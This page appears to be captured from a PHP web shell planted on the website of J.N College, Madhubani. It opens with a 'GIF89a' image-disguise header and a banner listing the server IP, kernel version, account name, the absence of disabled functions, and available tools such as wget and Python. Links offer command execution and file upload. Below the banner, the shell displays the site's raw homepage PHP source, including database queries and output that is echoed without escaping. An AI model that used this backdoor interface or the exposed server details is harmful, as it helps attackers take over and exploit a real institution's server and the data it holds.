GIF89a;
Server IP : 172.26.0.195 / Your IP : 3.142.43.244 Web Server : Apache System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64 User : jnclnmuac ( 1026) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jnclnmuac/public_html/web/../web/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include("admin/connection.php"); $query="select * from tbl_notice order by file_id desc"; $res=mysqli_query($dbCon,$query); $query2="select * from tbl_gallery order by gal_id desc LIMIT 0, 4"; $res2=mysqli_query($dbCon,$query2); $query3="select * from tbl_slider"; $res3=mysqli_query($dbCon,$query3); ?> <?php include 'headernew.php';?> <!-- Banner Wrapper Start --> <div class="banner-wrapper"> <div class="carousel fade-carousel slide" data-ride="carousel" data-interval="4000" id="bs-carousel"> <!-- Overlay --> <div id="myCarousel" class="carousel slide" data-ride="carousel" > <!-- Indicators --> <ol class="carousel-indicators"> <li data-target="#myCarousel" data-slide-to="0" class="active"></li> <li data-target="#myCarousel" data-slide-to="1"></li> <li data-target="#myCarousel" data-slide-to="2"></li> <li data-target="#myCarousel" data-slide-to="2"></li> </ol> <!-- Wrapper for slides --> <div class="carousel-inner"> <?php $flag = 1; while ($row_slider = mysqli_fetch_assoc($res3)) { if ($flag == 1) { ?> <div class="item active"> <img src="./admin/slider/<?php echo $row_slider['pic'] ?>" alt="Los Angeles" style="width:100%; height:500px;"> <div class="carousel-caption"> <h2 style="background:rgba(96, 145, 186, 0.8);"><?php echo $row_slider['text1'] ?></h2> <p style="background:rgba(7, 10, 12, 0.8);"><?php echo $row_slider['text2'] ?></p> </div> </div> <?php } else { ?> <div class="item"> <img src="./admin/slider/<?php echo $row_slider['pic'] ?>" alt="Chicago" style="width:100%;height:500px;"> <div class="carousel-caption"> <h2 style="background:rgba(96, 145, 186, 0.8);"><?php echo $row_slider['text1'] ?></h2> <p style="background:rgba(7, 10, 12, 0.8);"><?php echo $row_slider['text2'] ?></p> </div> </div> <?php } $flag = 0; } ?> <!-- <div class="item"> <img src="ny.jpg" alt="New York" style="width:100%;"> <div class="carousel-caption"> <h3>New York</h3> <p>We love the Big Apple!</p> </div> </div> --> </div> <!-- Left and right controls --> <a class="left carousel-control" href="#myCarousel" data-slide="prev"> <span class="glyphicon glyphicon-chevron-left"></span> <span class="sr-only">Previous</span> </a> <a class="right carousel-control" href="#myCarousel" data-slide="next"> <span class="glyphicon glyphicon-chevron-right"></span> <span class="sr-only">Next</span> </a> </div> </div> </div> <!-- Banner Wrapper End --> <!-- About Us --> <div class="about-us"> <div class="container"> <div class="row"> <div class="col-sm-12 col-md-8"> <h2>Few Words <br> About <span>J.N College</span></h2> <p><strong>J.N College, Madhubani</strong> was established in 1956 by late Dr. Badri Narayan Singh. It is a leading government college which was initially set up as a Girl's tutorial college and imparted education up to the graduation level. The mission of the institution was to ensure that the privilege of education reached the young women, especially those from the weaker sections of society. </p> <p>It was later converted into Women's College, Samastipur and was accorded its first affiliation in 1964 by the Bihar University, Muzaffarpur up to Degree standard. The College became a constituent unit under Lalit Narayan Mithila University, Kameshwar Nagar, Darbhanga in 1980. </p> <p>At present the college offers honours courses in the faculties of Science, Social Science and Humanities. It is only the center for women's higher education in the district and the oldest one in North Bihar. It got affiliation under the U.G.C Act, 2f in the year 1977.</p> <a href="about.html" id="a">Read More...</a> </div> <div class="col-sm-12 col-md-4 pull-right hidden-sm"> <h2>Important <br /><span>Notifications</span></h2> <div class="unordered-list"> <ul> <marquee direction="up" onmouseover="this.stop()" onmouseout="this.start()" style="color:red;height:300px;"> <?php while($row=mysqli_fetch_array($res,MYSQLI_BOTH)) { ?> <li><a href="admin/notice/<?php echo $row['file_name']; ?>" target="_blank" style="color:red; border:none;"><?php echo $row['notice']; ?></a></li> <?php } ?> </marquee> <a href="show_all.php" target="_self">Show all..</a> </ul> </div> </div> </div> </div> </div> <!-- Callouts Wrapper Start --> <div class="callouts-wrapper"> <div class="container"> <h2>Welcome to <span>J.N College</span></h2> <p class="center"> J.N College, Madhubani is the center for higher education in the district and the oldest one in North Bihar.</p> <p class="center"> These 65+ years have been witness to the astounding achievements and accomplishments of our alumni, students and faculty members.</p> <div class="row"> <div class="col-sm-6 col-md-4"> <div class="callouts"> <div class="icon"><i class="fa fa-book" aria-hidden="true"></i></div> <div class="content"> <h3>Automated Library</h3> <p>We have well equiped fully automated library with 8000 books.</p> </div> </div> </div> <div class="col-sm-6 col-md-4"> <div class="callouts"> <div class="icon"> <i class="fa fa-paint-brush" aria-hidden="true"></i></div> <div class="content"> <h3>Neat & Clean Environment</h3> <p>We have a lavish green eco-friendly clean campus.</p> </div> </div> </div> <div class="col-sm-6 col-md-4"> <div class="callouts"> <div class="icon"><i class="fa fa-users" aria-hidden="true"></i></div> <div class="content"> <h3>Experienced Faculty</h3> <p>The students learn under the guidance of experienced faculties.</p> </div> </div> </div> <div class="col-sm-6 col-md-4"> <div class="callouts"> <div class="icon"><i class="fa fa-cogs" aria-hidden="true"></i></div> <div class="content"> <h3>Laboratory Facility</h3> <p>Students get practical exposure while working in well equipped laboratries.</p> </div> </div> </div> <div class="col-sm-6 col-md-4"> <div class="callouts"> <div class="icon"> <i class="fa fa-building" aria-hidden="true"></i></div> <div class="content"> <h3>Largest Infrastructure</h3> <p>We have one of the largest infra-structure with all modern amenities.</p> </div> </div> </div> <div class="col-sm-6 col-md-4"> <div class="callouts"> <div class="icon"><i class="fa fa-internet-explorer" aria-hidden="true"></i></div> <div class="content"> <h3>24*7 Internet Facility</h3> <p>Students get facilty of 24*7 Internet availability in the campus.</p> </div> </div> </div> </div> </div> </div> <!-- Call to Action End --> <!-- Faculty Wrapper Start --> <div class="team-wrapper"> <div class="container"> <div class="row"> <h2>Our<span> Mentors</span></h2> <div id="owl-demo" class="owl-carousel owl-theme"> <div class="item"> <div class="img-box" style="box-shadow:5px 5px 10px black;"> <img src="images/team/Rajendra_Arlekar.jpg" alt="Team2" title="Team2" /> <div class="text-center"> <h4>Shri Rajendra Arlekar</h4> <p>Hon'ble Governer, Bihar</p> </div> </div> <div class="text-center"> <h4><b>Shri Rajendra Arlekar</b></h4> <p>Hon'ble Governer, Bihar</p> </div> </div> <div class="item"> <div class="img-box" style="box-shadow:5px 5px 10px black;"> <img src="images/team/nitish.jpg" alt="Team1" title="Team1" /> <div class="text-center"> <h4>Shri Nitish Kumar</h4> <p>Hon'ble Chief Minister, Bihar</p> </div> </div> <div class="text-center"> <h4><b>Shri Nitish Kumar</b></h4> <p>Hon'ble Chief Minister, Bihar</p> </div> </div> <div class="item"> <div class="img-box" style="box-shadow:5px 5px 10px black;"> <img src="images/team/vc_prof_sanjay_kumar_choudhary.jpeg" alt="Team2" title="Team2" /> <div class="text-center"> <h4>Prof S.K.Choudhary</h4> <p>Hon'ble Vice Chancellor, LNMU Darbhanga</p> </div> </div> <div class="text-center"> <h4><b>Prof S.K.Choudhary</b></h4> <p>Hon'ble Vice Chancellor, LNMU Darbhanga</p> </div> </div> <div class="item"> <div class="img-box" style="box-shadow:5px 5px 10px black;"> <img src="images/team/laxmikant.jpg" alt="Team2" title="Team2" /> <div class="text-center"> <h4>Dr. Laxmi Kant Mishra</h4> <p>Principal, J.N College</p> </div> </div> <div class="text-center"> <h4><b>Dr. Laxmi Kant Mishra</b></h4> <p>Principal, J.N College<br/> Madhubani</p> </div> </div> </div> </div> </div> </div> <!-- Faculty Wrapper End --> <!-- Testimonials Wrapper Start --> <div class="call-to-action"> <div class="container"> <h3>Student Information System</h3> <p>This section will deal with all the information pertaining to a student such as personal, academic as well as digital document and student report.</p> <a href="https://cas.jnclnmu.ac.in/" target="_blank">Sign - In</a> </div> </div> <!-- Callouts Wrapper End --> <!-- Satisfied Wrapper start --> <div class="satisfied-wrapper"> <div class="container"> <h2>Statistics of <span>Education</span></h2> <div class="statistics"> <div class="col-sm-3 counter"> <i class="fa fa-list-alt" aria-hidden="true"></i> <div class="number animateNumber" data-num="17"> <span>17 </span></div> <p>Our Courses</p> </div> <div class="col-sm-3 counter"> <i class="fa fa-user" aria-hidden="true"></i> <div class="number animateNumber" data-num="20"> <span>20</span></div> <p>Our staff</p> </div> <div class="col-sm-3 counter"> <i class="fa fa-users" aria-hidden="true"></i> <div class="number animateNumber" data-num="4000"> <span>4000</span></div> <p>Students</p> </div> <div class="col-sm-3 counter"> <i class="fa fa-graduation-cap" aria-hidden="true"></i> <div class="number animateNumber" data-num="50000"> <span>500000</span></div> <p>Graduates</p> </div> </div> </div> </div> <!-- satisfied Wrapper End --> <!-- Call to Action start --> <div class="testimonials-wrapper"> <div class="container"> <h2>Our <span>Testimonials</span></h2> <div id="testimonials" class="owl-carousel owl-theme"> <div class="item"> <img src="images/testimonials1.png" alt="Testimonials"> <p>I have had a very good time at Women's College. All the teachers are very friendly and enthusiastic. The lessons are very varied and inspiring. Thank you very much!!!</p> <h3>- Surbhi Singh <span> BSc. - Maths</span></h3> </div> <div class="item"> <img src="images/testimonials2.png" alt="Testimonials"> <p>Helpful and ample material, motivated and inspirational faculty. Great feedback…. Constructive and helpful. Thank you.</p> <h3>- Akansha Kumari<span> BA. - Hindi</span></h3> </div> <div class="item"> <img src="images/testimonials3.png" alt="Testimonials"> <p>It was a unique and special experience – something inbetween Science lessons and holidays. Moreover, I never had such an honest insight into English mentality and culture. Great!!.</p> <h3>- Tulika Prasad<span>MSc. - Physics</span></h3> </div> <div class="item"> <img src="images/testimonials1.png" alt="Testimonials"> <p>It was incredible, time flew and I can’t wait to be back here with you.</p> <h3>- Veena Devi <span>BCom. - Accounts</span></h3> </div> <div class="item"> <img src="images/testimonials2.png" alt="Testimonials"> <p>I liked the small number of people attending my course (Creative Teaching). All the lessons were well-prepared and well-structured. The 2 teachers co-operated very well with each other and there was always a friendly and encouraging atmosphere.</p> <h3>- Sunita <span>BSc. - Chemistry</span></h3> </div> <div class="item"> <img src="images/testimonials3.png" alt="Testimonials"> <p>Everybody here is so kind and nice. Thanks a billion for your excellent & professional work.</p> <h3>- Kajal Paswan <span> BA. - History</span></h3> </div> </div> </div> </div> <!-- Testimonials Wrapper End --> <!-- sponsers Start --> <div class="sponsers"> <div class="container"> <h2>Our <span>Associations</span></h2> <div id="sponsers" class="owl-carousel owl-theme"> <div class="item"> <img src="images/logo/lnmulogo.jpg" alt="Education Logos"></div> <div class="item"> <img src="images/logo/SWAYAM.png" alt="Education Logos"></div> <div class="item"> <img src="images/logo/ugc.png" alt="Education Logos"></div> <div class="item"> <img src="images/logo/prabha.png" alt="Education Logos"></div> <div class="item"> <img src="images/logo/NAAC_LOGO.png" alt="Education Logos"></div> <div class="item"> <img src="images/logo/aiu.jpg" alt="Education Logos"></div> <div class="item"> <img src="images/logo/unnat.jpg" alt="Education Logos"></div> </div> </div> </div> <!-- sponsers End --> <!-- Gallery Start --> <div class="gal-container full-width"> <?php $cnt=1; while($row2=mysqli_fetch_array($res2,MYSQLI_BOTH)) { ?> <div class="col-md-3 col-sm-6 co-xs-12 gal-item"> <div class="box"> <a href="javascript:void(0)" data-toggle="modal" data-target="#<?php echo $cnt;?>"> <div class="caption"> <h4><?php echo $row2['text1'];?></h4> <p><?php echo $row2['text2'];?></p> <i class="fa fa-search" aria-hidden="true"></i> </div> <img src="admin/gallery/<?php echo $row2['pic']?>" alt="Gallery Image"> </a> <div class="modal fade" id="<?php echo $cnt;?>" tabindex="-1" role="dialog"> <div class="modal-dialog" role="document"> <div class="modal-content"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button> <div class="modal-body"> <img src="admin/gallery/<?php echo $row2['pic']?>" alt="Gallery Image"> </div> <div class="col-md-12 description"> <h4><?php echo $row2['text2'];?></h4> </div> </div> </div> </div> </div> </div> <?php $cnt++; } ?> </div> <!-- Gallery End --> <?php include 'footerindex.php';?>